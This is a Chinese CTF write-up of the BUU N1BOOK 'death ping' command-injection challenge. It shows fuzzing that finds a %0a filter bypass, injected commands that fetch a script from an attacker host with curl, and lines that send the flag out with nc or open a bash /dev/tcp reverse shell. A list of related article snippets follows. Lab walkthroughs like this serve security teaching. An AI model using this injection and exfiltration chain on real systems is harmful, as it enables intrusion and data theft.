介绍:路由器管理台经常存在的网络ping测试,开发者常常会禁用大量的恶意字符串

version: "3.2"services:converter:image: registry.cn-hangzhou.aliyuncs.com/n1book/web-command:latestports:- 80:80

本地搭建docker-compose

打开题目

输入127.0.0.1&&id,发现报错。存在恶意字符过滤

抓包进行fuzz扫描测试

fuzz字典

"~","!","@","#","$","%","^","&","*","(",")","-","_","\\","[","]"," ' ","%0a","%0b","%0c","%0d"

两个回显长度,不一致。

测试%0a是否可以绕过

说明可以绕过

在本地攻击机中写入shell文件 1.sh

ls
cat /FLAG | nc 自己的攻击机 4444

由于docker是没有bash、python程序的,并且sh反弹是不行的

bash -i >& /dev/tcp/127.0.0.1/4444 0>&1

开启apache服务,可以通过网络访问1.sh

抓包,让靶机下载1.sh

127.0.0.1%0acurl 攻击机ip > /tmp/1.sh

下载到/tmp/sh.sh

给这个sh脚本加权限

127.0.0.1%0achmod 777 /tmp/sh.sh

在攻击机中开启监听端口 4444

nc -lvvp 4444

在靶机中运行sh脚本取得flag

BUU N1BOOK题目死亡ping命令相关推荐

  1. [实验室每日一题][20201123][Web]死亡ping命令

    原题目:BUUCTF–[第二章 web进阶]死亡ping命令 前置基础(本题会用到的相关知识) 标准输入,标准输出是什么? 要弄清什么是标准输入输出.首先需要弄懂什么是IO. IO 的 I 是 Inp ...

  2. php ping 命令注入,CTF关于ping命令注入问题

    题目样式 对于看到ping或者ping命令却没有弄waf时就要想到命令注入. 具体注入方法 看到ping命令就可以利用截断来执行新的命令. 首先测试所有的截断符号: '$' ';' '|' '-' ' ...

  3. linux的ping命令含义,Linux ping命令详解

    Linux系统的ping命令是常用的网络命令,它通常用来测试与目标主机的连通性 基于IMCP协议 常见命令参数 -q 不显示任何传送封包的信息,只显示最后的结果 -n 只输出数值 -R 记录路由过程 ...

  4. java tracert_Java模拟Tracert和ping命令实现跃点追踪

    1. Tracert(跟踪路由)用于确定 IP数据包访问目标所采取的路径. Tracert 命令使用用 IP 生存时间  (TTL) 字段和 ICMP错误消息来确定从一个Host到网络上其他主机的Ro ...

  5. 响应因特网端口ping命令_如何使用Ping命令识别基本的Internet问题

    响应因特网端口ping命令 Next time you call your help desk, do you want to wow them with your networking knowle ...

  6. ping命令使用及其常用参数

    PING (Packet Internet Groper),因特网包探索器,用于测试网络连接量检查网络是否连通,可以很好地帮助我们分析和判定网络故障.Ping发送一个ICMP(Internet Con ...

  7. ping 命令还能这么玩?

    点击上方"方志朋",选择"设为星标" 回复"666"获取新整理的面试文章 小Hub领读: 说实话,我以为ping就仅仅用来判断网络通不通,哈 ...

  8. Ping命令 参数介绍!

    Ping命令详解 对于Windows下ping命令相信大家已经再熟悉不过了,但是能把ping的功能发挥到最大的人却并不是很多,当然我也并不是说我可以让ping发挥最大的功能,我也只不过经常用ping这 ...

  9. 局域网连接其他机器命令_弱电工程师必备技能,PING命令使用方法大全

    做弱电的工程人员都知道,在这个数字化网络时代,要学会一些网络常用命令,有了它们,可以快速排查出问题,Ping就是最基础命令之一,Ping是使用最常用的网络测试命令,主要用于确定网络的连通性.下面是学习 ...

最新文章

  1. ffmpeg + opencv 把摄像头画面保存为mp4文件
  2. python教材目录_Python实用教程/高等院校信息技术规划教材简介,目录书摘
  3. ElementUI el-time-picker-只显示小时、分钟,分并添加范围校验
  4. 积极参加各类竞赛——大学生竞赛
  5. C++标准库之String
  6. Storing CGPoint, CGSize and CGRect in Collections with NSValue
  7. Apache IoTDB 物联网数据库引擎
  8. adb工具的下载及配置
  9. 游戏开发人员需要了解的5种ASO技术,苹果游戏aso优化
  10. 制作u盘winpe启动盘_如何制作U盘启动盘
  11. 鸿蒙系统 微内核 sel4,微内核 seL4 Mapping
  12. 华为云宣布将在全球范围内推出区块链服务
  13. python用sympy解二元一次方程等数学运算
  14. 【李宏毅机器学习学习1】
  15. 摄像头 - 屏幕刷新率(Hz)与帧率(fps)的区别与关系
  16. 【原理】Basic Integer Overflows
  17. 一个运维工程师必须要知道的(工作职责与应用场景)干货整理
  18. 2022-2028全球与中国长寿和抗衰老治疗市场现状及未来发展趋势
  19. model.state_dict和model.parameters和model.named_parameters区别
  20. php 挂qq,挂QQ的网页源代码[ASP/PHP/JS]

热门文章

  1. vue3.2props设置默认值【defineProps】
  2. derived distribution
  3. 我在阿里做中后台开发的实践
  4. OLAP(三):Impala介绍 、 (和hive/spark对比)、COMPUTE STATS
  5. rac管理 sqlserver_Oracle RAC管理及维护命令详解
  6. c语言中的countif函数,COUNTIF函数高能应用
  7. Java字节流与字符流,断点续传实现分片下载、上传、合并
  8. 计算机主机分为几部分,计算机系统的三大组成部分
  9. ubuntu计划任务: cron
  10. linux移动子目录到上一目录,linux 把当前目录的一个子目录里的文件移动到另一个子目录里用什么指令...